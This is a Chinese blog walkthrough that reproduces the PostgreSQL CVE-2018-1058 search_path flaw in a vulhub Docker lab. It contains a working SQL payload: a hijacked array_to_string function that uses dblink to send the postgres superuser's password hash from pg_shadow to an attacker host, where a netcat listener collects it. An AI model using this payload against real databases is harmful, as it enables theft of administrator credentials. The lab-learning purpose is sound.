PostgreSQL 提权漏洞(CVE-2018-1058)

最新推荐文章于 2023-05-17 11:11:57 发布
最新推荐文章于 2023-05-17 11:11:57 发布
阅读量1.2k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: sql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824500
版权

声明

好好学习,天天向上

漏洞描述

PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。

影响范围

9.3到10

复现过程

这里使用9.6.7版本

使用vulhub

/app/vulhub-master/postgres/CVE-2018-1058

使用docker启动

docker-compose build
docker-compose up -d

先通过普通用户vulhub:vulhub的身份登录postgres:

psql --host 192.168.239.129 --username vulhub

执行如下语句后退出(向192.168.239.139的6666端口传送密码)

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=192.168.239.139 port=6666 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

在这里插入图片描述

kali监听6666,等待超级用户触发我们留下的这个“后门”。

nc -lvvp 6666

装自己是超级用户,docker中,用超级用户的身份执行pg_dump命令,导出vulhub这个数据库的内容。

docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub

执行上述命令的同时,“后门”已被触发

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-search
03-04
3. **数据存储**:为了方便快速检索,"cve-search" 可能会将解析后的数据存储在数据库中,如SQLite、MySQL或PostgreSQL。Python的sqlite3库可用于轻量级数据库操作,而SQLAlchemy可以处理更复杂的ORM(对象关系映射...
PostgreSQL数据库
最新发布
m0_64481831的博客
05-28 686
postgreSQL是一个功能强大对象关系数据库管理系统。
CVE-2018-1058 PostgreSQL 漏洞
weixin_51387754的博客
12-10 798
漏洞原理 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 ​ 普通用户连接到数据库—>注入危险代码—>等待超级用户登录触发后门—>收到敏感信息 影响版本:PostgreSQL < 10 漏洞复现 环境准备 打开漏洞存放路径:cd /home/guiltyfet/vulhub/postgres/CVE-2018-1058 docker-compose up -d
PostgreSQL 漏洞复现(CVE-2018-1058)
又菜又爱倒腾的博客
10-29 2551
#PostgreSQL 漏洞(CVE-2018-1058)# 一、漏洞简介 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 二、漏洞影响 影响版本 9.3到10 三、产生原因 PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所有的对象都会被创建到这个模式下。所以SELECT * FROM a;
PostgreSQL CVE-2018-1058 问题?
将臣三代的博客
05-05 470
简 介 在之前的版本中,PgSql 在不同表空间下新建名称相似的对象时,会对其他用户查询该对象时造成不可预知的错误就想特洛伊木马病毒似的。 什么是 CVE-2018-1058? 在PgSql 7.3版本中介绍了”schemas”,在不同的命名空间允许用户创建对象或者函数等。 Catalog 和 Schema :可理解为一个容器或者数据库对象命名空间,解决命名冲突问题* 1个数据库----...
CVE-Search:CVE-Search(名称仍为字母),是一种机器学习工具,致力于检测Twitter,Github等社交网络中的漏洞利用或概念证明。 它还能够在CVE上的Google,Yandex,DuckDuckGo上进行相关搜索,并检测内容是否可能是功能漏洞,概念证明或仅仅是有关漏洞的信息
02-03
CVE-Search(名称仍为字母)是一种机器学习工具,专注于检测Twitter,Github等社交网络中的漏洞利用或概念证明。 它还能够在CVE上的Google,Yandex,DuckDuckGo上进行相关搜索,并检测内容是否可能是功能漏洞,概念...
mysql及postgresql漏洞修复包
02-02
mysql-connector-java-8.0.19版本修复包:mysql-connector-java-8.0.27.jar postgresql--42.1.4版本修复包:postgresql-42.2.26.jar
go-cve-dictionary:构建CVE的本地副本(NVD和日语JVN)。 服务器模式,方便查询
05-01
go-cve-dictionary需要以下软件包。 SQLite3,MySQL,PostgreSQL或Redis 吉特 海湾合作委员会 前往v1.7.1或更高版本 这是Amazon EC2服务器的示例。 $ ssh ec2-user@52.100.100.100 -i ~ /.ssh/private.pem $ ...
security-research:安全研究
03-19
安全研究 ... CVE-2019-3466-通过pg_ctlcluster进行Debian / Ubuntu PostgreSQL升级 。详细的写作: : 。 Debian咨询: 。 Ubuntu咨询: CVE-2019-12571-PIA macOS任意文件覆盖 。 CVE-2019-12572-P
PostgreSQL CVE-2018-1058(search_path) - 暨数据库的那些陷阱与攻防指南
weixin_34056162的博客
04-18 293
标签 PostgreSQL , search_path , 陷阱 , overload function 背景 PostgreSQL 元宵节对各个版本发布了小版本补丁,主要是解决一个search_path的功能,被攻击者利用来设置陷阱的问题。 https://git.postgresql.org/gitweb/?p=postgresql.git&am...
PostgreSQL 远程代码执行漏洞分析及利用—【CVE-2018-1058】
3569
03-07 2790
https://xianzhi.aliyun.com/forum/topic/2109漏洞描述A flaw was found in the way Postgresql allowed a user to modify the behavior of a query for other users. An attacker with a user account could use this f...
CVE-2018-1058(远程代码执行漏洞)vulhub复现
qq_52279315的博客
05-17 212
vulhub靶场复现【postgresql
CVE-2018-1058简介
HighGO
04-04 1319
CVE-2018-1058描述了一个用户在不同模式下创建的一些名字很像的对象,是怎么改变其他用户的查询行为而且导致意料之外或者有害的行为的。它主要描述了这个问题以及在PostgreSQL中减轻这些问题的影响的办法。 什么是CVE-2018-1058? PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所...
【vulhub】PostGresql限命令执行漏洞复现(CVE-2019-9193)
errorr0
08-05 812
CVE-2019-9193
P6 利用Vulhub复现漏洞 -PostgreSQL 漏洞CVE-2018-1058)
在下小黄的博客
05-08 875
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P6 利用Vulhub复现漏洞 -PostgreSQL 漏洞CVE-2018-1058) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月29日 软件: kali 2020.4 、Burp Suite Pro 、火狐浏览器 、Vulhub靶机 PostgreSQL 漏洞Vulhub 复现漏洞原理环境准备漏洞复现 Vulhub 复现 PostgreSQL 漏洞 漏洞原理 Po
【vulhub】PostGresql远程代码执行漏洞复现(CVE-2018-1058)
errorr0
08-05 943
CVE-2018-1058
藏经阁-PostgresChina2018_刘东明_PostgreSQL并行查询.pdf
09-09
"藏经阁-PostgresChina2018_刘东明_PostgreSQL并行查询.pdf" 在2018年的PostgreSQL中国技术大会上,刘东明分享了关于PostgreSQL数据库系统的并行查询功能。PostgreSQL是一个强大的开源关系型数据库系统,其并行查询...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值